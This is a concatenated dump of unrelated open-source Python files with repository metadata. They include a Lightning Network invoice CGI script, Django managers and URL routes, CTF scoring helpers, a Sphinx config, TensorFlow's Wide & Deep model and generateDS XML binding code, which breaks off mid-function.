# 2015 4:
# print(matrixArrayNum([[1,2],[3,4],[5,6]]).mean_vt())
# print(matrixArrayNum([[1,2],[3,4],[5,6]]).ubds_vt())
import random
import time
#print(b)
d = b.get_runtime_list()
start = time.time()
for i in range(100):
for j in range(50):
c = b[i,j]
#b[i,j] = random.randrange(1, 1000)
#d[i][j] = random.randrange(1, 1000)
# print( b )
elpse = time.time() - start
print(elpse)
# 2015 3:
# a = matrixArrayNum([1,1]);print(a)
# b = matrixArrayNum([1,1])
# c = matrixArrayNum([1,1])
#
# b + 0
# print(isum(a,b,c))
# ubds(a)
#
# a = a / 2.0
# print(a)
# 2015 3, middleware has been removed into another package as an independent work:
#
# b = matrixArrayNum([[1,2],[3,4]])
# b.setHeader(['time','power'])
# b.setIndice(['1','2'])
#
# c = matrixArray([[1,2],[3,4]])
# c.trp()
# print(c[0])
#
# c.addh(checkRIndex, matrixArrayLists.__getitem__)
# c.setHeader(['time','power'])
# c.setIndice(['1','2'])
#
# print(a[[1,2],[1,2],[1,2]])
# print(a[[1,2],[1,2],0])
|
yiakwy/numpy
|
PyMatrix/v4/matrixArray.py
|
Python
|
bsd-3-clause
| 56,236
|
#!/usr/bin/python3
import cgi
import os
import sys
import codecs
import binascii
import grpc
import rpc_pb2 as ln
import rpc_pb2_grpc as lnrpc
def connect():
    """Open an authenticated, TLS-secured gRPC channel to the local lnd node.

    Returns a LightningStub bound to localhost:10009.
    """
    # lnd ships an ECDSA tls.cert; grpc needs this cipher-suite hint or the
    # TLS handshake with the lnd rpc server fails.
    os.environ["GRPC_SSL_CIPHER_SUITES"] = 'HIGH+ECDSA'
    with open('/home/lnd/.lnd/tls.cert', 'rb') as cert_file:
        tls_cert = cert_file.read()
    with open('/home/lnd/.lnd/data/chain/bitcoin/mainnet/invoice.macaroon', 'rb') as mac_file:
        macaroon = codecs.encode(mac_file.read(), 'hex')
    def attach_macaroon(_context, callback):
        # per-call credential: send the macaroon as gRPC metadata
        # (for more info see grpc docs)
        callback([('macaroon', macaroon)], None)
    # Combine channel-level TLS with the per-call macaroon credential so every
    # RPC is both encrypted and authenticated.
    combined_creds = grpc.composite_channel_credentials(
        grpc.ssl_channel_credentials(tls_cert),
        grpc.metadata_call_credentials(attach_macaroon))
    channel = grpc.secure_channel('localhost:10009', combined_creds)
    return lnrpc.LightningStub(channel)
def main():
    """CGI entry point: create an lnd invoice from form fields, emit JSON."""
    stub = connect()
    form = cgi.FieldStorage()
    fields = form.keys()
    # default to a zero-value invoice with an empty memo
    value = int(form["value"].value) if "value" in fields else 0
    memo = form["memo"].value if "memo" in fields else ""
    invoice = stub.AddInvoice(ln.Invoice(memo=memo, value=value))
    print("Content-Type: application/json; charset=UTF-8")
    print("")
    r_hash_hex = str(binascii.hexlify(invoice.r_hash), "ascii")
    print('{"r_hash":"%s","payment_request":"%s","add_index":%d}'
          % (r_hash_hex, invoice.payment_request, invoice.add_index))
# Toggle to surface tracebacks in the HTTP response instead of stderr only.
debug = False
#debug = True
if debug:
    sys.stderr = sys.stdout
try:
    main()
except Exception:
    import traceback
    # NOTE(review): if main() already printed its headers/body before raising,
    # these extra header lines land mid-response -- confirm that is acceptable
    # for this CGI host.
    print("Status: 500 Internal Error")
    print("Content-Type: text/html; charset=UTF-8")
    print("")
    print("<h1>500 Internal Server Error</h1>")
    if debug:
        # show the traceback to the client
        print("<pre>")
        traceback.print_exc()
        print("</pre>")
    else:
        # traceback goes to stderr (the server log) only
        traceback.print_exc()
|
jhoenicke/mempool
|
web/lnd/invoice.py
|
Python
|
agpl-3.0
| 2,378
|
import unittest
import threading
import os
from PyQt5.QtCore import Qt
from PyQt5.QtTest import QTest
from mpfmonitor.core.mpfmon import *
"""class InitMPFMon(unittest.TestCase):
@classmethod
def setUpClass(self):
app = QApplication(sys.argv)
machine_path = os.path.join(os.getcwd(), "machine_files")
self.mpfmon_sut = MainWindow(app, machine_path, None, testing=True)
QTest.qWait(5000)
def test_case(self):
self.assertEqual(True, True)
"""
if __name__ == '__main__':
unittest.main()
|
missionpinball/mpf-monitor
|
mpfmonitor/tests/test_mpfmon.py
|
Python
|
mit
| 545
|
from django.db import models
from django.core.exceptions import EmptyResultSet
class SistemaManager(models.Manager):
    """Manager used for interactions with the Sistemas de Cultura."""
    def get_queryset(self):
        # De-duplicate by ente federado (name + FK), then restrict the base
        # queryset to those ids and eagerly load related objects.
        qs = super().get_queryset().distinct('ente_federado__nome', 'ente_federado')
        return qs.filter(id__in=qs).select_related()
class HistoricoManager(models.Manager):
    """
    Manager responsible for handling the history of a given ente federado.
    """
    def ente(self, cod_ibge=None):
        """Return the history entries of one ente federado, looked up by IBGE code.

        Raises EmptyResultSet when no (or a falsy) code is supplied.
        """
        if not cod_ibge:
            raise EmptyResultSet
        return self.filter(ente_federado__cod_ibge=cod_ibge)
|
culturagovbr/sistema-nacional-cultura
|
adesao/managers.py
|
Python
|
agpl-3.0
| 768
|
from typing import NamedTuple, Optional
from django.contrib.auth import get_user_model
from problem.models import ProblemInstance
from .score import calculate_problem_score
User = get_user_model()
class UserProblemInfo(NamedTuple):
    """Per-user snapshot of one problem instance: solve status and scoring."""
    user: User                      # the user this snapshot is computed for
    problem_instance: ProblemInstance
    solved: bool                    # has `user` solved this instance
    first_solver: Optional[User]    # None when nobody has solved it yet
    solver_count: int               # number of successful solvers so far
    solver_list: list               # usernames of the solvers
    effective_points: int           # score as computed by calculate_problem_score
    def display_first_solve(self):
        # True when there is no solver yet, or this user was the first solver.
        return self.first_solver is None or self.user == self.first_solver
def get_user_problem_info(user, problem_instance):
    """Build a UserProblemInfo snapshot for `user` on `problem_instance`."""
    # auth-log entries carrying the correct key == successful solves, oldest first
    solved_log = problem_instance.problemauthlog_set \
        .filter(auth_key=problem_instance.problem.auth_key) \
        .order_by('datetime')
    first_solver = solved_log.first().user if solved_log.exists() else None
    solved = solved_log.filter(user=user).exists()
    solve_count = solved_log.count()
    solve_user_list = list(map(lambda x: x.user.username, solved_log))
    # score as if this user's (pending) solve were already counted
    effective_solve_count = solve_count + (0 if solved else 1)
    first_blood = first_solver is None or user == first_solver
    points = calculate_problem_score(problem_instance, effective_solve_count, first_blood)
    # NOTE: solver_count reports the *actual* solve count, not the effective one
    return UserProblemInfo(user, problem_instance, solved, first_solver, solve_count, solve_user_list, points)
def get_problem_list_user_info(problem_list, user):
    """Return (per-problem UserProblemInfo list, user's total score) for a problem list."""
    instances = problem_list.probleminstance_set.order_by('points', 'problem__title')
    # one snapshot per instance, in display order
    infos = [get_user_problem_info(user, instance) for instance in instances]
    # only solved problems contribute to the user's score
    total_score = sum(info.effective_points for info in infos if info.solved)
    return infos, total_score
def get_problem_instance_score(problem_instance, fixed=False):
    """Current score of a problem instance (first-blood bonus NOT included).

    With fixed=True the statically configured point value is returned instead.
    """
    if fixed:
        return problem_instance.points
    # dynamic scoring: depends on how many users have solved it so far
    solve_count = problem_instance.problemauthlog_set \
        .filter(auth_key=problem_instance.problem.auth_key) \
        .order_by('datetime') \
        .count()
    return calculate_problem_score(problem_instance, solve_count, False)
def get_problem_list_user_score(problem_list, user, fixed=False):
    """Sum the scores of the problems `user` has solved within `problem_list`."""
    instances = problem_list.probleminstance_set.order_by('points', 'problem__title')
    total = 0
    for instance in instances:
        has_solved = instance.problemauthlog_set.filter(
            user=user, auth_key=instance.problem.auth_key).exists()
        if has_solved:
            total += get_problem_instance_score(instance, fixed)
    return total
def get_problem_list_total_score(problem_list, fixed=False):
    """Maximum obtainable score over all instances (first-blood bonus NOT included)."""
    return sum(get_problem_instance_score(instance, fixed)
               for instance in problem_list.probleminstance_set.all())
|
PLUS-POSTECH/study.plus.or.kr
|
src/problem/helpers/problem_info.py
|
Python
|
apache-2.0
| 2,919
|
#!/usr/bin/env python
# Re-export everything from TweetGrabber at the package level.
# NOTE(review): this is a Python-2 style implicit relative import; under
# Python 3 it would need to be `from .TweetGrabber import *` -- confirm the
# intended interpreter version.
from TweetGrabber import *
|
weilneb/twitter-utils
|
twutils/__init__.py
|
Python
|
mit
| 48
|
from django.conf.urls import url, include
from check.core.views import *
# URL routes for the check/core app, grouped by resource.
urlpatterns = [
    # Django's stock auth views (login/logout/password management)
    url(r'', include('django.contrib.auth.urls')),
    url(r'^index/', IndexView.as_view(), name='index'),
    # Cliente CRUD
    url(r'^cliente/$', ListCliente.as_view(), name='list_cliente'),
    url(r'^cliente/add$', CreateCliente.as_view(), name='create_cliente'),
    url(r'^cliente/edit/(?P<pk>\d+)$', UpdateCliente.as_view(), name='update_cliente'),
    url(r'^cliente/delete/(?P<pk>\d+)$', DeleteCliente.as_view(), name='delete_cliente'),
    # Fornecedor CRUD
    url(r'^fornecedor/$', ListFornecedor.as_view(), name='list_fornecedor'),
    url(r'^fornecedor/add$', CreateFornecedor.as_view(), name='create_fornecedor'),
    url(r'^fornecedor/edit/(?P<pk>\d+)$', UpdateFornecedor.as_view(), name='update_fornecedor'),
    url(r'^fornecedor/delete/(?P<pk>\d+)$', DeleteFornecedor.as_view(), name='delete_fornecedor'),
    # Banco CRUD
    url(r'^banco/$', ListBanco.as_view(), name='list_banco'),
    url(r'^banco/add$', CreateBanco.as_view(), name='create_banco'),
    url(r'^banco/edit/(?P<pk>\d+)$', UpdateBanco.as_view(), name='update_banco'),
    url(r'^banco/delete/(?P<pk>\d+)$', DeleteBanco.as_view(), name='delete_banco'),
    # Empresa (single editable record)
    url(r'^empresa/$', UpdateEmpresa.as_view(), name='empresa'),
    # Cheques emitidos (issued checks) CRUD
    url(r'^cheque/emitir/$', ListChequeEmitido.as_view(), name='list_cheque_emissao'),
    url(r'^cheque/emitir/add$', CreateChequeEmitido.as_view(), name='create_cheque_emissao'),
    url(r'^cheque/emitir/edit/(?P<pk>\d+)$', UpdateChequeEmitido.as_view(), name='update_cheque_emissao'),
    url(r'^cheque/emitir/delete/(?P<pk>\d+)$', DeleteChequeEmitido.as_view(), name='delete_cheque_emissao'),
    # Cheques recebidos (received checks) CRUD
    url(r'^cheque/receber/$', ListChequeRecebido.as_view(), name='list_cheque_recebimento'),
    url(r'^cheque/receber/add$', CreateChequeRecebido.as_view(), name='create_cheque_recebimento'),
    url(r'^cheque/receber/edit/(?P<pk>\d+)$', UpdateChequeRecebido.as_view(), name='update_cheque_recebimento'),
    url(r'^cheque/receber/delete/(?P<pk>\d+)$', DeleteChequeRecebido.as_view(), name='delete_cheque_recebimento'),
    # Check clearing / transfer workflows
    url(r'^baixa/$', BaixaChequesView.as_view(), name='baixa'),
    url(r'^repasse/$', RepasseChequesView.as_view(), name='repasse'),
    # AJAX endpoints
    url(r'^ajax/get_situacao_cliente/$', get_situacao_cliente, name='get_situacao_cliente'),
    url(r'^ajax/efetuar_baixa/$', efetuar_baixa, name='efetuar_baixa'),
    url(r'^ajax/efetuar_repasse/$', efetuar_repasse, name='efetuar_repasse'),
]
|
gabrielnaoto/man_check_control
|
check/core/urls.py
|
Python
|
mit
| 2,444
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=redefined-builtin
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.viewcode"]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"debot"
copyright = u"2014, Harry Liang"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "0.1.0"
# The full version, including alpha/beta/rc tags.
release = "0.1.0"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "nature"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = "debotdoc"
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
("index", "debot.tex", u"debot Documentation", u"Harry Liang", "manual"),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [("index", "debot", u"debot Documentation", [u"Harry Liang"], 1)]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
"index",
"debot",
u"debot Documentation",
u"Harry Liang",
"debot",
"One line description of project.",
"Miscellaneous",
),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
|
tryagainconcepts/debot
|
docs/conf.py
|
Python
|
mit
| 8,437
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Built-in WideNDeep model classes."""
from tensorflow.python.eager import backprop
from tensorflow.python.keras import activations
from tensorflow.python.keras import backend
from tensorflow.python.keras import layers as layer_module
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import data_adapter
from tensorflow.python.keras.engine import training as keras_training
from tensorflow.python.keras.utils import generic_utils
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import keras_export
@keras_export('keras.experimental.WideDeepModel')
class WideDeepModel(keras_training.Model):
r"""Wide & Deep Model for regression and classification problems.
This model jointly train a linear and a dnn model.
Example:
```python
linear_model = LinearModel()
dnn_model = keras.Sequential([keras.layers.Dense(units=64),
keras.layers.Dense(units=1)])
combined_model = WideDeepModel(linear_model, dnn_model)
combined_model.compile(optimizer=['sgd', 'adam'], 'mse', ['mse'])
# define dnn_inputs and linear_inputs as separate numpy arrays or
# a single numpy array if dnn_inputs is same as linear_inputs.
combined_model.fit([linear_inputs, dnn_inputs], y, epochs)
# or define a single `tf.data.Dataset` that contains a single tensor or
# separate tensors for dnn_inputs and linear_inputs.
dataset = tf.data.Dataset.from_tensors(([linear_inputs, dnn_inputs], y))
combined_model.fit(dataset, epochs)
```
Both linear and dnn model can be pre-compiled and trained separately
before jointly training:
Example:
```python
linear_model = LinearModel()
linear_model.compile('adagrad', 'mse')
linear_model.fit(linear_inputs, y, epochs)
dnn_model = keras.Sequential([keras.layers.Dense(units=1)])
dnn_model.compile('rmsprop', 'mse')
dnn_model.fit(dnn_inputs, y, epochs)
combined_model = WideDeepModel(linear_model, dnn_model)
combined_model.compile(optimizer=['sgd', 'adam'], 'mse', ['mse'])
combined_model.fit([linear_inputs, dnn_inputs], y, epochs)
```
"""
def __init__(self, linear_model, dnn_model, activation=None, **kwargs):
"""Create a Wide & Deep Model.
Args:
linear_model: a premade LinearModel, its output must match the output of
the dnn model.
dnn_model: a `tf.keras.Model`, its output must match the output of the
linear model.
activation: Activation function. Set it to None to maintain a linear
activation.
**kwargs: The keyword arguments that are passed on to BaseLayer.__init__.
Allowed keyword arguments include `name`.
"""
super(WideDeepModel, self).__init__(**kwargs)
base_layer.keras_premade_model_gauge.get_cell('WideDeep').set(True)
self.linear_model = linear_model
self.dnn_model = dnn_model
self.activation = activations.get(activation)
def call(self, inputs, training=None):
    """Forward pass: linear(x_lin) + dnn(x_dnn), then the optional activation.

    `inputs` may be a single tensor (fed to both sub-models) or a 2-sequence
    of (linear_inputs, dnn_inputs).
    """
    if not isinstance(inputs, (tuple, list)) or len(inputs) != 2:
        # single input: both sub-models consume the same tensor(s)
        linear_inputs = dnn_inputs = inputs
    else:
        linear_inputs, dnn_inputs = inputs
    linear_output = self.linear_model(linear_inputs)
    # pylint: disable=protected-access
    if self.dnn_model._expects_training_arg:
        # forward the training flag only when the dnn model accepts one
        if training is None:
            training = backend.learning_phase()
        dnn_output = self.dnn_model(dnn_inputs, training=training)
    else:
        dnn_output = self.dnn_model(dnn_inputs)
    # element-wise sum of the two towers, preserving nested structure
    output = nest.map_structure(lambda x, y: (x + y), linear_output, dnn_output)
    if self.activation:
        return nest.map_structure(self.activation, output)
    return output
# This does not support gradient scaling and LossScaleOptimizer.
def train_step(self, data):
    """Run one optimization step.

    When `self.optimizer` is a list/tuple, optimizer[0] updates the linear
    tower and optimizer[1] the dnn tower; otherwise a single optimizer
    updates all trainable variables.
    """
    x, y, sample_weight = data_adapter.unpack_x_y_sample_weight(data)
    x, y, sample_weight = data_adapter.expand_1d((x, y, sample_weight))
    with backprop.GradientTape() as tape:
        y_pred = self(x, training=True)
        loss = self.compiled_loss(
            y, y_pred, sample_weight, regularization_losses=self.losses)
    # metrics are updated outside the tape -- no gradients flow through them
    self.compiled_metrics.update_state(y, y_pred, sample_weight)
    if isinstance(self.optimizer, (list, tuple)):
        # separate optimizers for the two towers
        linear_vars = self.linear_model.trainable_variables
        dnn_vars = self.dnn_model.trainable_variables
        linear_grads, dnn_grads = tape.gradient(loss, (linear_vars, dnn_vars))
        linear_optimizer = self.optimizer[0]
        dnn_optimizer = self.optimizer[1]
        linear_optimizer.apply_gradients(zip(linear_grads, linear_vars))
        dnn_optimizer.apply_gradients(zip(dnn_grads, dnn_vars))
    else:
        # single optimizer over the whole model
        trainable_variables = self.trainable_variables
        grads = tape.gradient(loss, trainable_variables)
        self.optimizer.apply_gradients(zip(grads, trainable_variables))
    return {m.name: m.result() for m in self.metrics}
def _make_train_function(self):
# Only needed for graph mode and model_to_estimator.
has_recompiled = self._recompile_weights_loss_and_weighted_metrics()
self._check_trainable_weights_consistency()
# If we have re-compiled the loss/weighted metric sub-graphs then create
# train function even if one exists already. This is because
# `_feed_sample_weights` list has been updated on re-compile.
if getattr(self, 'train_function', None) is None or has_recompiled:
# Restore the compiled trainable state.
current_trainable_state = self._get_trainable_state()
self._set_trainable_state(self._compiled_trainable_state)
inputs = (
self._feed_inputs + self._feed_targets + self._feed_sample_weights)
if not isinstance(backend.symbolic_learning_phase(), int):
inputs += [backend.symbolic_learning_phase()]
if isinstance(self.optimizer, (list, tuple)):
linear_optimizer = self.optimizer[0]
dnn_optimizer = self.optimizer[1]
else:
linear_optimizer = self.optimizer
dnn_optimizer = self.optimizer
with backend.get_graph().as_default():
with backend.name_scope('training'):
# Training updates
updates = []
linear_updates = linear_optimizer.get_updates(
params=self.linear_model.trainable_weights, # pylint: disable=protected-access
loss=self.total_loss)
updates += linear_updates
dnn_updates = dnn_optimizer.get_updates(
params=self.dnn_model.trainable_weights, # pylint: disable=protected-access
loss=self.total_loss)
updates += dnn_updates
# Unconditional updates
updates += self.get_updates_for(None)
# Conditional updates relevant to this model
updates += self.get_updates_for(self.inputs)
metrics = self._get_training_eval_metrics()
metrics_tensors = [
m._call_result for m in metrics if hasattr(m, '_call_result') # pylint: disable=protected-access
]
with backend.name_scope('training'):
# Gets loss and metrics. Updates weights at each call.
fn = backend.function(
inputs, [self.total_loss] + metrics_tensors,
updates=updates,
name='train_function',
**self._function_kwargs)
setattr(self, 'train_function', fn)
# Restore the current trainable state
self._set_trainable_state(current_trainable_state)
def get_config(self):
linear_config = generic_utils.serialize_keras_object(self.linear_model)
dnn_config = generic_utils.serialize_keras_object(self.dnn_model)
config = {
'linear_model': linear_config,
'dnn_model': dnn_config,
'activation': activations.serialize(self.activation),
}
base_config = base_layer.Layer.get_config(self)
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
linear_config = config.pop('linear_model')
linear_model = layer_module.deserialize(linear_config, custom_objects)
dnn_config = config.pop('dnn_model')
dnn_model = layer_module.deserialize(dnn_config, custom_objects)
activation = activations.deserialize(
config.pop('activation', None), custom_objects=custom_objects)
return cls(
linear_model=linear_model,
dnn_model=dnn_model,
activation=activation,
**config)
|
sarvex/tensorflow
|
tensorflow/python/keras/premade/wide_deep.py
|
Python
|
apache-2.0
| 9,006
|
#-----------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
from .. import localinterfaces
def test_load_ips():
    """Smoke test: _load_ips must run without raising."""
    # Override the machinery that skips it if it was called before
    localinterfaces._load_ips.called = False
    # Just check this doesn't error (no assertion on the discovered IPs)
    localinterfaces._load_ips(suppress_exceptions=False)
|
mattvonrocketstein/smash
|
smashlib/ipy3x/utils/tests/test_localinterfaces.py
|
Python
|
mit
| 607
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Tue Oct 28 21:10:10 2014 by generateDS.py version 2.12e.
#
# Command line options:
# ('-o', 'schema/vchs/ondemand/sc/sc/instanceType.py')
#
# Command line arguments:
# schema/vchs/ondemand/sc/sc/instance.xsd
#
# Command line:
# ./generateDS-2.12e/generateDS.py -o "schema/vchs/ondemand/sc/sc/instanceType.py" schema/vchs/ondemand/sc/sc/instance.xsd
#
# Current working directory (os.getcwd()):
# vchs-api-cli-cli
#
import sys
import getopt
import re as re_
import base64
import datetime as datetime_
etree_ = None
Verbose_import_ = False
(
XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
    """Parse an XML document using whichever ElementTree flavor was imported."""
    if (XMLParser_import_library == XMLParser_import_lxml and
            'parser' not in kwargs):
        # Use the lxml ElementTree compatible parser so that, e.g.,
        # we ignore comments.
        kwargs['parser'] = etree_.ETCompatXMLParser()
    doc = etree_.parse(*args, **kwargs)
    return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
# The runtime support class can be overridden by placing a custom
# generatedssuper.py module on the import path; otherwise the fallback
# definition below is used.
try:
    from generatedssuper import GeneratedsSuper
except ImportError as exp:
    class GeneratedsSuper(object):
        # Matches a trailing timezone offset such as '+02:00' / '-13:30'.
        tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
        class _FixedOffsetTZ(datetime_.tzinfo):
            # Minimal fixed-offset tzinfo (pre-dates datetime.timezone).
            def __init__(self, offset, name):
                # offset is in minutes east of UTC.
                self.__offset = datetime_.timedelta(minutes=offset)
                self.__name = name
            def utcoffset(self, dt):
                return self.__offset
            def tzname(self, dt):
                return self.__name
            def dst(self, dt):
                # No DST information is modelled for fixed offsets.
                return None
        def gds_format_string(self, input_data, input_name=''):
            # Emitted as-is; XML escaping happens in quote_xml().
            return input_data
        def gds_validate_string(self, input_data, node, input_name=''):
            # Normalize falsy values (None, '') to the empty string.
            if not input_data:
                return ''
            else:
                return input_data
        def gds_format_base64(self, input_data, input_name=''):
            return base64.b64encode(input_data)
        def gds_validate_base64(self, input_data, node, input_name=''):
            return input_data
        def gds_format_integer(self, input_data, input_name=''):
            return '%d' % input_data
        def gds_validate_integer(self, input_data, node, input_name=''):
            return input_data
        def gds_format_integer_list(self, input_data, input_name=''):
            return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return input_data
        def gds_format_float(self, input_data, input_name=''):
            # 15-digit fixed point with trailing zeros stripped; note an
            # integral value renders with a trailing dot, e.g. 10.0 -> '10.'.
            return ('%.15f' % input_data).rstrip('0')
        def gds_validate_float(self, input_data, node, input_name=''):
            return input_data
        def gds_format_float_list(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_validate_float_list(self, input_data, node, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of floats')
            return input_data
        def gds_format_double(self, input_data, input_name=''):
            # Scientific notation, e.g. '1.000000e+01'.
            return '%e' % input_data
        def gds_validate_double(self, input_data, node, input_name=''):
            return input_data
        def gds_format_double_list(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_validate_double_list(self, input_data, node, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of doubles')
            return input_data
        def gds_format_boolean(self, input_data, input_name=''):
            # Serializes Python booleans as XSD 'true'/'false'.
            return ('%s' % input_data).lower()
        def gds_validate_boolean(self, input_data, node, input_name=''):
            return input_data
        def gds_format_boolean_list(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_validate_boolean_list(self, input_data, node, input_name=''):
            # Only the four XSD boolean lexical forms are accepted.
            values = input_data.split()
